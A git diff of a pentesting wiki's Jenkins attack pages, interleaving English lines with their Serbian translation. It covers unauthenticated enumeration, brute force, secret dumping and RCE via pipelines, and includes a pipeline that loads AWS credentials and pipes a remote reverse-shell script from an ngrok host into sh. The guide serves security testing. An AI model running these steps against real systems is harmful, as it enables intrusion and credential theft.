- **Zahtevati linearnu istoriju.** Sprečava spajanje commit-a koji se šalju na odgovarajuće grane.
- **Uključiti administratore**. Ako ovo nije postavljeno, administratori mogu zaobići restrikcije.
- **Ograničiti ko može slati na odgovarajuće grane**. Ograničiti ko može poslati PR.
> [!NOTE]
> As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline.
> Kao što vidite, čak i ako ste uspeli da dobijete neka akreditivna sredstva korisnika, **repozitorijumi mogu biti zaštićeni sprečavajući vas da šaljete kod na master** na primer da kompromitujete CI/CD pipeline.
## References
@@ -253,7 +247,3 @@ Different protections can be applied to a branch (like to master):
- [https://docs.github.com/en/actions/security-guides/encrypted-secrets](https://docs.github.com/en/actions/security-guides/encrypted-secrets)
{{#include ../../banners/hacktricks-training.md}}

294
src/pentesting-ci-cd/jenkins-security/README.md
View File

@@ -2,84 +2,78 @@
{{#include ../../banners/hacktricks-training.md}}
## Basic Information
## Osnovne informacije
Jenkins is a tool that offers a straightforward method for establishing a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **programming languages** and source code repositories using pipelines. Furthermore, it automates various routine development tasks. While Jenkins doesn't eliminate the **need to create scripts for individual steps**, it does provide a faster and more robust way to integrate the entire sequence of build, test, and deployment tools than one can easily construct manually.
Jenkins je alat koji nudi jednostavan način za uspostavljanje **kontinuirane integracije** ili **kontinuirane isporuke** (CI/CD) okruženja za gotovo **bilo koju** kombinaciju **programskih jezika** i repozitorijuma izvornog koda koristeći pipeline-ove. Pored toga, automatizuje razne rutinske razvojne zadatke. Iako Jenkins ne eliminiše **potrebu za kreiranjem skripti za pojedinačne korake**, pruža brži i robusniji način za integraciju celokupnog niza alata za izgradnju, testiranje i implementaciju nego što se može lako konstruisati ručno.
{{#ref}}
basic-jenkins-information.md
{{#endref}}
## Unauthenticated Enumeration
In order to search for interesting Jenkins pages without authentication like (_/people_ or _/asynchPeople_, this lists the current users) you can use:
## Neautorizovana enumeracija
Da biste pretraživali zanimljive Jenkins stranice bez autentifikacije kao što su (_/people_ ili _/asynchPeople_, ovo prikazuje trenutne korisnike) možete koristiti:
```
msf> use auxiliary/scanner/http/jenkins_enum
```
Check if you can execute commands without needing authentication:
Proverite da li možete izvršavati komande bez potrebe za autentifikacijom:
```
msf> use auxiliary/scanner/http/jenkins_command
```
Bez kredencijala možete pogledati unutar _**/asynchPeople/**_ putanje ili _**/securityRealm/user/admin/search/index?q=**_ za **korisnička imena**.
Without credentials you can look inside _**/asynchPeople/**_ path or _**/securityRealm/user/admin/search/index?q=**_ for **usernames**.
You may be able to get the Jenkins version from the path _**/oops**_ or _**/error**_
Možda ćete moći da dobijete verziju Jenkins-a iz putanje _**/oops**_ ili _**/error**_
![](<../../images/image (146).png>)
### Known Vulnerabilities
### Poznate ranjivosti
{{#ref}}
https://github.com/gquere/pwn_jenkins
{{#endref}}
## Login
## Prijava
In the basic information you can check **all the ways to login inside Jenkins**:
U osnovnim informacijama možete proveriti **sve načine za prijavu unutar Jenkins-a**:
{{#ref}}
basic-jenkins-information.md
{{#endref}}
### Register
### Registracija
You will be able to find Jenkins instances that **allow you to create an account and login inside of it. As simple as that.**
Moći ćete da pronađete Jenkins instance koje **omogućavaju da kreirate nalog i prijavite se u njega. Tako jednostavno.**
### **SSO Login**
### **SSO Prijava**
Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/).
Takođe, ako su **SSO** **funkcionalnosti**/**pluginovi** prisutni, onda biste trebali pokušati da se **prijavite** u aplikaciju koristeći test nalog (tj. test **Github/Bitbucket nalog**). Trik iz [**ovde**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/).
### Bruteforce
**Jenkins** lacks **password policy** and **username brute-force mitigation**. It's essential to **brute-force** users since **weak passwords** or **usernames as passwords** may be in use, even **reversed usernames as passwords**.
**Jenkins** nema **politiku lozinki** i **mitigaciju brute-force napada na korisnička imena**. Bitno je **brute-force** korisnike jer se mogu koristiti **slabe lozinke** ili **korisnička imena kao lozinke**, čak i **obrnuta korisnička imena kao lozinke**.
```
msf> use auxiliary/scanner/http/jenkins_login
```
### Password spraying
Use [this python script](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) or [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray).
Koristite [ovaj python skript](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) ili [ovaj powershell skript](https://github.com/chryzsh/JenkinsPasswordSpray).
### IP Whitelisting Bypass
Many organizations combine **SaaS-based source control management (SCM) systems** such as GitHub or GitLab with an **internal, self-hosted CI** solution like Jenkins or TeamCity. This setup allows CI systems to **receive webhook events from SaaS source control vendors**, primarily for triggering pipeline jobs.
Mnoge organizacije kombinuju **SaaS-based source control management (SCM) systems** kao što su GitHub ili GitLab sa **internim, samostalno hostovanim CI** rešenjem poput Jenkins-a ili TeamCity-a. Ova postavka omogućava CI sistemima da **prijemaju webhook događaje od SaaS provajdera za kontrolu izvora**, prvenstveno za pokretanje pipeline poslova.
To achieve this, organizations **whitelist** the **IP ranges** of the **SCM platforms**, permitting them to access the **internal CI system** via **webhooks**. However, it's important to note that **anyone** can create an **account** on GitHub or GitLab and configure it to **trigger a webhook**, potentially sending requests to the **internal CI system**.
Da bi to postigle, organizacije **stavljaju na belu listu** **IP opsege** **SCM platformi**, omogućavajući im pristup **internom CI sistemu** putem **webhook-a**. Međutim, važno je napomenuti da **bilo ko** može da kreira **nalog** na GitHub-u ili GitLab-u i konfiguriše ga da **pokrene webhook**, potencijalno šaljući zahteve **internom CI sistemu**.
Check: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/)
Proverite: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/)
## Internal Jenkins Abuses
In these scenarios we are going to suppose you have a valid account to access Jenkins.
U ovim scenarijima pretpostavljamo da imate važeći nalog za pristup Jenkins-u.
> [!WARNING]
> Depending on the **Authorization** mechanism configured in Jenkins and the permission of the compromised user you **might be able or not to perform the following attacks.**
> U zavisnosti od **Authorization** mehanizma konfiguranog u Jenkins-u i dozvole kompromitovanog korisnika, **možda ćete moći ili ne moći da izvršite sledeće napade.**
For more information check the basic information:
Za više informacija proverite osnovne informacije:
{{#ref}}
basic-jenkins-information.md
@@ -87,165 +81,155 @@ basic-jenkins-information.md
### Listing users
If you have accessed Jenkins you can list other registered users in [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/)
Ako ste pristupili Jenkins-u, možete da navedete druge registrovane korisnike na [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/)
### Dumping builds to find cleartext secrets
Use [this script](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) to dump build console outputs and build environment variables to hopefully find cleartext secrets.
Koristite [ovaj skript](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) da izbacite izlaze konzole gradnje i promenljive okruženja gradnje kako biste se nadali da ćete pronaći tajne u čistom tekstu.
```bash
python3 jenkins_dump_builds.py -u alice -p alice http://127.0.0.1:8080/ -o build_dumps
cd build_dumps
gitleaks detect --no-git -v
```
### **Krađa SSH kredencijala**
### **Stealing SSH Credentials**
If the compromised user has **enough privileges to create/modify a new Jenkins node** and SSH credentials are already stored to access other nodes, he could **steal those credentials** by creating/modifying a node and **setting a host that will record the credentials** without verifying the host key:
Ako kompromitovani korisnik ima **dovoljno privilegija da kreira/modifikuje novi Jenkins čvor** i SSH kredencijali su već sačuvani za pristup drugim čvorovima, on bi mogao **ukrasti te kredencijale** kreiranjem/modifikovanjem čvora i **postavljanjem hosta koji će snimati kredencijale** bez verifikacije host ključa:
![](<../../images/image (218).png>)
You will usually find Jenkins ssh credentials in a **global provider** (`/credentials/`), so you can also dump them as you would dump any other secret. More information in the [**Dumping secrets section**](./#dumping-secrets).
Obično ćete pronaći Jenkins ssh kredencijale u **globalnom provajderu** (`/credentials/`), tako da ih možete i dumpovati kao što biste dumpovali bilo koju drugu tajnu. Više informacija u [**odeljku o dumpovanju tajni**](./#dumping-secrets).
### **RCE in Jenkins**
### **RCE u Jenkins-u**
Getting a **shell in the Jenkins server** gives the attacker the opportunity to leak all the **secrets** and **env variables** and to **exploit other machines** located in the same network or even **gather cloud credentials**.
Dobijanje **shell-a na Jenkins serveru** daje napadaču priliku da iscuri sve **tajne** i **env varijable** i da **iskoristi druge mašine** smeštene u istoj mreži ili čak **prikupi cloud kredencijale**.
By default, Jenkins will **run as SYSTEM**. So, compromising it will give the attacker **SYSTEM privileges**.
Podrazumevano, Jenkins će **raditi kao SYSTEM**. Tako da, kompromitovanje će napadaču dati **SYSTEM privilegije**.
### **RCE Creating/Modifying a project**
### **RCE Kreiranje/Modifikovanje projekta**
Creating/Modifying a project is a way to obtain RCE over the Jenkins server:
Kreiranje/Modifikovanje projekta je način da se dobije RCE nad Jenkins serverom:
{{#ref}}
jenkins-rce-creating-modifying-project.md
{{#endref}}
### **RCE Execute Groovy script**
### **RCE Izvršavanje Groovy skripte**
You can also obtain RCE executing a Groovy script, which might my stealthier than creating a new project:
Takođe možete dobiti RCE izvršavanjem Groovy skripte, koja može biti manje uočljiva od kreiranja novog projekta:
{{#ref}}
jenkins-rce-with-groovy-script.md
{{#endref}}
### RCE Creating/Modifying Pipeline
### RCE Kreiranje/Modifikovanje Pipeline-a
You can also get **RCE by creating/modifying a pipeline**:
Takođe možete dobiti **RCE kreiranjem/modifikovanjem pipeline-a**:
{{#ref}}
jenkins-rce-creating-modifying-pipeline.md
{{#endref}}
## Pipeline Exploitation
## Eksploatacija Pipeline-a
To exploit pipelines you still need to have access to Jenkins.
Da biste eksploatisali pipeline-ove, još uvek morate imati pristup Jenkins-u.
### Build Pipelines
### Build Pipeline-i
**Pipelines** can also be used as **build mechanism in projects**, in that case it can be configured a **file inside the repository** that will contains the pipeline syntax. By default `/Jenkinsfile` is used:
**Pipeline-i** se takođe mogu koristiti kao **mehanizam za izgradnju u projektima**, u tom slučaju može se konfigurisati **fajl unutar repozitorijuma** koji će sadržati sintaksu pipeline-a. Podrazumevano se koristi `/Jenkinsfile`:
![](<../../images/image (127).png>)
It's also possible to **store pipeline configuration files in other places** (in other repositories for example) with the goal of **separating** the repository **access** and the pipeline access.
Takođe je moguće **čuvati konfiguracione fajlove pipeline-a na drugim mestima** (na primer, u drugim repozitorijumima) sa ciljem **razdvajanja** pristupa repozitorijumu i pristupa pipeline-u.
If an attacker have **write access over that file** he will be able to **modify** it and **potentially trigger** the pipeline without even having access to Jenkins.\
It's possible that the attacker will need to **bypass some branch protections** (depending on the platform and the user privileges they could be bypassed or not).
Ako napadač ima **pravo pisanja nad tim fajlom**, moći će da **modifikuje** i **potencijalno pokrene** pipeline bez čak i pristupa Jenkins-u.\
Moguće je da će napadač morati da **obiđe neke zaštite grana** (u zavisnosti od platforme i privilegija korisnika, one se mogu obići ili ne).
The most common triggers to execute a custom pipeline are:
Najčešći okidači za izvršavanje prilagođenog pipeline-a su:
- **Pull request** to the main branch (or potentially to other branches)
- **Push to the main branch** (or potentially to other branches)
- **Update the main branch** and wait until it's executed somehow
- **Pull request** na glavnu granu (ili potencijalno na druge grane)
- **Push na glavnu granu** (ili potencijalno na druge grane)
- **Ažuriranje glavne grane** i čekanje da se na neki način izvrši
> [!NOTE]
> If you are an **external user** you shouldn't expect to create a **PR to the main branch** of the repo of **other user/organization** and **trigger the pipeline**... but if it's **bad configured** you could fully **compromise companies just by exploiting this**.
> Ako ste **spoljašnji korisnik**, ne biste trebali očekivati da kreirate **PR na glavnu granu** repozitorijuma **drugog korisnika/organizacije** i **pokrenete pipeline**... ali ako je **loše konfiguran**, mogli biste potpuno **kompromitovati kompanije samo eksploatacijom ovoga**.
### Pipeline RCE
In the previous RCE section it was already indicated a technique to [**get RCE modifying a pipeline**](./#rce-creating-modifying-pipeline).
U prethodnom RCE odeljku već je naznačena tehnika za [**dobijanje RCE modifikovanjem pipeline-a**](./#rce-creating-modifying-pipeline).
### Checking Env variables
It's possible to declare **clear text env variables** for the whole pipeline or for specific stages. This env variables **shouldn't contain sensitive info**, but and attacker could always **check all the pipeline** configurations/Jenkinsfiles:
### Proveravanje Env varijabli
Moguće je deklarisati **env varijable u čistom tekstu** za ceo pipeline ili za specifične faze. Ove env varijable **ne bi trebale sadržati osetljive informacije**, ali napadač uvek može **proveriti sve konfiguracije pipeline-a/Jenkinsfile-ova:**
```bash
pipeline {
agent {label 'built-in'}
environment {
GENERIC_ENV_VAR = "Test pipeline ENV variables."
}
agent {label 'built-in'}
environment {
GENERIC_ENV_VAR = "Test pipeline ENV variables."
}
stages {
stage("Build") {
environment {
STAGE_ENV_VAR = "Test stage ENV variables."
}
steps {
stages {
stage("Build") {
environment {
STAGE_ENV_VAR = "Test stage ENV variables."
}
steps {
```
### Dumping secrets
For information about how are secrets usually treated by Jenkins check out the basic information:
Za informacije o tome kako se tajne obično tretiraju u Jenkinsu, pogledajte osnovne informacije:
{{#ref}}
basic-jenkins-information.md
{{#endref}}
Credentials can be **scoped to global providers** (`/credentials/`) or to **specific projects** (`/job/<project-name>/configure`). Therefore, in order to exfiltrate all of them you need to **compromise at least all the projects** that contains secrets and execute custom/poisoned pipelines.
There is another problem, in order to get a **secret inside the env** of a pipeline you need to **know the name and type of the secret**. For example, you try lo **load** a **`usernamePassword`** **secret** as a **`string`** **secret** you will get this **error**:
Akreditivi mogu biti **ograničeni na globalne provajdere** (`/credentials/`) ili na **specifične projekte** (`/job/<project-name>/configure`). Stoga, da biste eksfiltrirali sve njih, morate **kompromitovati barem sve projekte** koji sadrže tajne i izvršiti prilagođene/otrovane pipeline-ove.
Postoji još jedan problem, da biste dobili **tajnu unutar env** pipeline-a, morate **znati ime i tip tajne**. Na primer, ako pokušate da **učitate** **`usernamePassword`** **tajnu** kao **`string`** **tajnu**, dobićete ovu **grešku**:
```
ERROR: Credentials 'flag2' is of type 'Username with password' where 'org.jenkinsci.plugins.plaincredentials.StringCredentials' was expected
```
Here you have the way to load some common secret types:
Evo kako da učitate neke uobičajene tipove tajni:
```bash
withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USERNAME', passwordVariable: 'PASS')]) {
sh '''
env #Search for USERNAME and PASS
'''
sh '''
env #Search for USERNAME and PASS
'''
}
withCredentials([string(credentialsId: 'flag1', variable: 'SECRET')]) {
sh '''
env #Search for SECRET
'''
sh '''
env #Search for SECRET
'''
}
withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) {
sh '''
env # Search for USERPASS
'''
sh '''
env # Search for USERPASS
'''
}
# You can also load multiple env variables at once
withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
sh '''
env
'''
string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
sh '''
env
'''
}
```
At the end of this page you can **find all the credential types**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/)
Na kraju ove stranice možete **pronaći sve tipove kredencijala**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/)
> [!WARNING]
> The best way to **dump all the secrets at once** is by **compromising** the **Jenkins** machine (running a reverse shell in the **built-in node** for example) and then **leaking** the **master keys** and the **encrypted secrets** and decrypting them offline.\
> More on how to do this in the [Nodes & Agents section](./#nodes-and-agents) and in the [Post Exploitation section](./#post-exploitation).
> Najbolji način da **izvučete sve tajne odjednom** je da **kompromitujete** **Jenkins** mašinu (na primer, pokretanjem reverzne ljuske u **ugrađenom čvoru**) i zatim **procurite** **master ključeve** i **šifrovane tajne** i dešifrujete ih van mreže.\
> Više o tome kako to uraditi u [odeljku Čvorovi i Agenti](./#nodes-and-agents) i u [odeljku Post Eksploatacija](./#post-exploitation).
### Triggers
### Okidači
From [the docs](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers): The `triggers` directive defines the **automated ways in which the Pipeline should be re-triggered**. For Pipelines which are integrated with a source such as GitHub or BitBucket, `triggers` may not be necessary as webhooks-based integration will likely already be present. The triggers currently available are `cron`, `pollSCM` and `upstream`.
Cron example:
Iz [dokumentacije](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers): Direktiva `triggers` definiše **automatske načine na koje bi Pipeline trebao biti ponovo aktiviran**. Za Pipelines koji su integrisani sa izvorom kao što su GitHub ili BitBucket, `triggers` možda neće biti potrebni jer će integracija zasnovana na webhook-ovima verovatno već biti prisutna. Trenutno dostupni okidači su `cron`, `pollSCM` i `upstream`.
Primer crona:
```bash
triggers { cron('H */4 * * 1-5') }
```
Check **other examples in the docs**.
### Nodes & Agents
@@ -258,54 +242,50 @@ For more information check the basic information:
basic-jenkins-information.md
{{#endref}}
You can enumerate the **configured nodes** in `/computer/`, you will usually find the \*\*`Built-In Node` \*\* (which is the node running Jenkins) and potentially more:
You can enumerate the **configured nodes** in `/computer/`, you will usually find the **`Built-In Node`** (which is the node running Jenkins) and potentially more:
![](<../../images/image (249).png>)
It is **specially interesting to compromise the Built-In node** because it contains sensitive Jenkins information.
It is **posebno zanimljivo kompromitovati Built-In node** because it contains sensitive Jenkins information.
To indicate you want to **run** the **pipeline** in the **built-in Jenkins node** you can specify inside the pipeline the following config:
```bash
pipeline {
agent {label 'built-in'}
agent {label 'built-in'}
```
### Potpuni primer
### Complete example
Pipeline in an specific agent, with a cron trigger, with pipeline and stage env variables, loading 2 variables in a step and sending a reverse shell:
Pipeline u specifičnom agentu, sa cron okidačem, sa pipeline i stage env varijablama, učitavajući 2 varijable u koraku i šaljući reverznu ljusku:
```bash
pipeline {
agent {label 'built-in'}
triggers { cron('H */4 * * 1-5') }
environment {
GENERIC_ENV_VAR = "Test pipeline ENV variables."
}
agent {label 'built-in'}
triggers { cron('H */4 * * 1-5') }
environment {
GENERIC_ENV_VAR = "Test pipeline ENV variables."
}
stages {
stage("Build") {
environment {
STAGE_ENV_VAR = "Test stage ENV variables."
}
steps {
withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS
'''
}
}
}
stages {
stage("Build") {
environment {
STAGE_ENV_VAR = "Test stage ENV variables."
}
steps {
withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS
'''
}
}
}
post {
always {
cleanWs()
}
}
post {
always {
cleanWs()
}
}
}
```
## Arbitrary File Read to RCE
{{#ref}}
@@ -329,40 +309,37 @@ jenkins-rce-creating-modifying-pipeline.md
## Post Exploitation
### Metasploit
```
msf> post/multi/gather/jenkins_gather
```
### Jenkins Tajne
### Jenkins Secrets
Možete da navedete tajne pristupajući `/credentials/` ako imate dovoljno dozvola. Imajte na umu da će ovo samo navesti tajne unutar `credentials.xml` datoteke, ali **datoteke za konfiguraciju gradnje** takođe mogu imati **više kredencijala**.
You can list the secrets accessing `/credentials/` if you have enough permissions. Note that this will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
If you can **see the configuration of each project**, you can also see in there the **names of the credentials (secrets)** being use to access the repository and **other credentials of the project**.
Ako možete **videti konfiguraciju svakog projekta**, takođe možete videti u njoj **imena kredencijala (tajni)** koji se koriste za pristup repozitorijumu i **druge kredencijale projekta**.
![](<../../images/image (180).png>)
#### From Groovy
#### Iz Groovy
{{#ref}}
jenkins-dumping-secrets-from-groovy.md
{{#endref}}
#### From disk
#### Sa diska
These files are needed to **decrypt Jenkins secrets**:
Ove datoteke su potrebne za **dešifrovanje Jenkins tajni**:
- secrets/master.key
- secrets/hudson.util.Secret
Such **secrets can usually be found in**:
Takve **tajne se obično mogu naći u**:
- credentials.xml
- jobs/.../build.xml
- jobs/.../config.xml
Here's a regex to find them:
Evo regex-a da ih pronađete:
```bash
# Find the secrets
grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
@@ -372,11 +349,9 @@ grep -lre "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
# Secret example
credentials.xml: <secret>{AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOzTSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==}</secret>
```
#### Decrypt Jenkins secrets offline
If you have dumped the **needed passwords to decrypt the secrets**, use [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **to decrypt those secrets**.
Ako ste izvezli **potrebne lozinke za dešifrovanje tajni**, koristite [**ovaj skript**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **da dešifrujete te tajne**.
```bash
python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml
06165DF2-C047-4402-8CAB-1C8EC526C115
@@ -384,23 +359,20 @@ python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAt985Hbb8KfIImS6dZlVG6swiotCiIlg/P7aME9PvZNUgg2Iyf2FT
```
#### Decrypt Jenkins secrets from Groovy
#### Dešifrovati Jenkins tajne iz Groovy-a
```bash
println(hudson.util.Secret.decrypt("{...}"))
```
### Kreirajte novog admin korisnika
### Create new admin user
1. Pristupite Jenkins config.xml datoteci u `/var/lib/jenkins/config.xml` ili `C:\Program Files (x86)\Jenkis\`
2. Potražite reč `<useSecurity>true</useSecurity>` i promenite reč **`true`** u **`false`**.
1. `sed -i -e 's/<useSecurity>true</<useSecurity>false</g' config.xml`
3. **Restartujte** **Jenkins** server: `service jenkins restart`
4. Sada ponovo idite na Jenkins portal i **Jenkins neće tražiti nikakve akreditive** ovaj put. Navigirajte do "**Manage Jenkins**" da ponovo postavite **administratorsku lozinku**.
5. **Ponovo omogućite** **bezbednost** promenom postavki na `<useSecurity>true</useSecurity>` i **ponovo restartujte Jenkins**.
1. Access the Jenkins config.xml file in `/var/lib/jenkins/config.xml` or `C:\Program Files (x86)\Jenkis\`
2. Search for the word `<useSecurity>true</useSecurity>`and change the word \*\*`true` \*\* to **`false`**.
1. `sed -i -e 's/<useSecurity>true</<useSecurity>false</g' config.xml`
3. **Restart** the **Jenkins** server: `service jenkins restart`
4. Now go to the Jenkins portal again and **Jenkins will not ask any credentials** this time. You navigate to "**Manage Jenkins**" to set the **administrator password again**.
5. **Enable** the **security** again by changing settings to `<useSecurity>true</useSecurity>` and **restart the Jenkins again**.
## References
## Reference
- [https://github.com/gquere/pwn_jenkins](https://github.com/gquere/pwn_jenkins)
- [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/)
@@ -410,7 +382,3 @@ println(hudson.util.Secret.decrypt("{...}"))
- [https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3](https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3)
{{#include ../../banners/hacktricks-training.md}}

90
src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
View File

@@ -1,87 +1,87 @@
# Basic Jenkins Information
# Osnovne informacije o Jenkinsu
{{#include ../../banners/hacktricks-training.md}}
## Access
## Pristup
### Username + Password
### Korisničko ime + Lozinka
The most common way to login in Jenkins if with a username or a password
Najčešći način prijave u Jenkins je putem korisničkog imena ili lozinke.
### Cookie
### Kolačić
If an **authorized cookie gets stolen**, it ca be used to access the session of the user. The cookie is usually called `JSESSIONID.*`. (A user can terminate all his sessions, but he would need to find out first that a cookie was stolen).
Ako se **autorizovani kolačić ukrade**, može se koristiti za pristup sesiji korisnika. Kolačić se obično naziva `JSESSIONID.*`. (Korisnik može prekinuti sve svoje sesije, ali prvo mora saznati da je kolačić ukraden).
### SSO/Plugins
### SSO/Pluginovi
Jenkins can be configured using plugins to be **accessible via third party SSO**.
Jenkins se može konfigurisati pomoću pluginova da bude **dostupan putem treće strane SSO**.
### Tokens
### Tokeni
**Users can generate tokens** to give access to applications to impersonate them via CLI or REST API.
**Korisnici mogu generisati tokene** kako bi omogućili pristup aplikacijama da ih imituju putem CLI ili REST API.
### SSH Keys
### SSH Ključevi
This component provides a built-in SSH server for Jenkins. Its an alternative interface for the [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/), and commands can be invoked this way using any SSH client. (From the [docs](https://plugins.jenkins.io/sshd/))
Ova komponenta pruža ugrađeni SSH server za Jenkins. To je alternativno sučelje za [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/), a komande se mogu pozivati na ovaj način koristeći bilo koji SSH klijent. (Iz [dokumentacije](https://plugins.jenkins.io/sshd/))
## Authorization
## Autorizacija
In `/configureSecurity` it's possible to **configure the authorization method of Jenkins**. There are several options:
U `/configureSecurity` moguće je **konfigurisati metodu autorizacije Jenkins-a**. Postoji nekoliko opcija:
- **Anyone can do anything**: Even anonymous access can administrate the server
- **Legacy mode**: Same as Jenkins <1.164. If you have the **"admin" role**, you'll be granted **full control** over the system, and **otherwise** (including **anonymous** users) you'll have **read** access.
- **Logged-in users can do anything**: In this mode, every **logged-in user gets full control** of Jenkins. The only user who won't have full control is **anonymous user**, who only gets **read access**.
- **Matrix-based security**: You can configure **who can do what** in a table. Each **column** represents a **permission**. Each **row** **represents** a **user or a group/role.** This includes a special user '**anonymous**', which represents **unauthenticated users**, as well as '**authenticated**', which represents **all authenticated users**.
- **Svako može raditi šta hoće**: Čak i anonimni pristup može administrirati server.
- **Legacy mode**: Isto kao Jenkins <1.164. Ako imate **"admin" ulogu**, dobićete **potpunu kontrolu** nad sistemom, a **inače** (uključujući **anonimne** korisnike) imaćete **pristup za čitanje**.
- **Prijavljeni korisnici mogu raditi šta hoće**: U ovom režimu, svaki **prijavljeni korisnik dobija potpunu kontrolu** nad Jenkins-om. Jedini korisnik koji neće imati potpunu kontrolu je **anonimni korisnik**, koji dobija samo **pristup za čitanje**.
- **Matrix-based security**: Možete konfigurisati **ko može raditi šta** u tabeli. Svaki **stubac** predstavlja **dozvolu**. Svaki **red** **predstavlja** **korisnika ili grupu/ulogu.** Ovo uključuje posebnog korisnika '**anonimni**', koji predstavlja **neautentifikovane korisnike**, kao i '**autentifikovani**', koji predstavlja **sve autentifikovane korisnike**.
![](<../../images/image (149).png>)
- **Project-based Matrix Authorization Strategy:** This mode is an **extension** to "**Matrix-based security**" that allows additional ACL matrix to be **defined for each project separately.**
- **Role-Based Strategy:** Enables defining authorizations using a **role-based strategy**. Manage the roles in `/role-strategy`.
- **Strategija autorizacije zasnovana na projektima:** Ovaj režim je **proširenje** na "**Matrix-based security**" koje omogućava dodatnu ACL matricu da bude **definisana za svaki projekat posebno.**
- **Strategija zasnovana na rolama:** Omogućava definisanje autorizacija koristeći **strategiju zasnovanu na rolama**. Upravljajte rolama u `/role-strategy`.
## **Security Realm**
## **Sigurnosno područje**
In `/configureSecurity` it's possible to **configure the security realm.** By default Jenkins includes support for a few different Security Realms:
U `/configureSecurity` moguće je **konfigurisati sigurnosno područje.** Po defaultu, Jenkins uključuje podršku za nekoliko različitih sigurnosnih područja:
- **Delegate to servlet container**: For **delegating authentication a servlet container running the Jenkins controller**, such as [Jetty](https://www.eclipse.org/jetty/).
- **Jenkins own user database:** Use **Jenkinss own built-in user data store** for authentication instead of delegating to an external system. This is enabled by default.
- **LDAP**: Delegate all authentication to a configured LDAP server, including both users and groups.
- **Unix user/group database**: **Delegates the authentication to the underlying Unix** OS-level user database on the Jenkins controller. This mode will also allow re-use of Unix groups for authorization.
- **Delegirati servlet kontejneru**: Za **delegiranje autentifikacije servlet kontejneru koji pokreće Jenkins kontroler**, kao što je [Jetty](https://www.eclipse.org/jetty/).
- **Jenkinsova vlastita baza korisnika:** Koristite **Jenkinsovu ugrađenu bazu podataka korisnika** za autentifikaciju umesto delegiranja na eksterni sistem. Ovo je omogućeno po defaultu.
- **LDAP**: Delegirati svu autentifikaciju na konfigurisan LDAP server, uključujući i korisnike i grupe.
- **Unix baza korisnika/grupa**: **Delegira autentifikaciju na osnovnu Unix** OS bazu korisnika na Jenkins kontroleru. Ovaj režim će takođe omogućiti ponovnu upotrebu Unix grupa za autorizaciju.
Plugins can provide additional security realms which may be useful for incorporating Jenkins into existing identity systems, such as:
Pluginovi mogu pružiti dodatna sigurnosna područja koja mogu biti korisna za uključivanje Jenkinsa u postojeće identitetske sisteme, kao što su:
- [Active Directory](https://plugins.jenkins.io/active-directory)
- [GitHub Authentication](https://plugins.jenkins.io/github-oauth)
- [Atlassian Crowd 2](https://plugins.jenkins.io/crowd2)
## Jenkins Nodes, Agents & Executors
## Jenkins Čvorovi, Agenti i Izvršioci
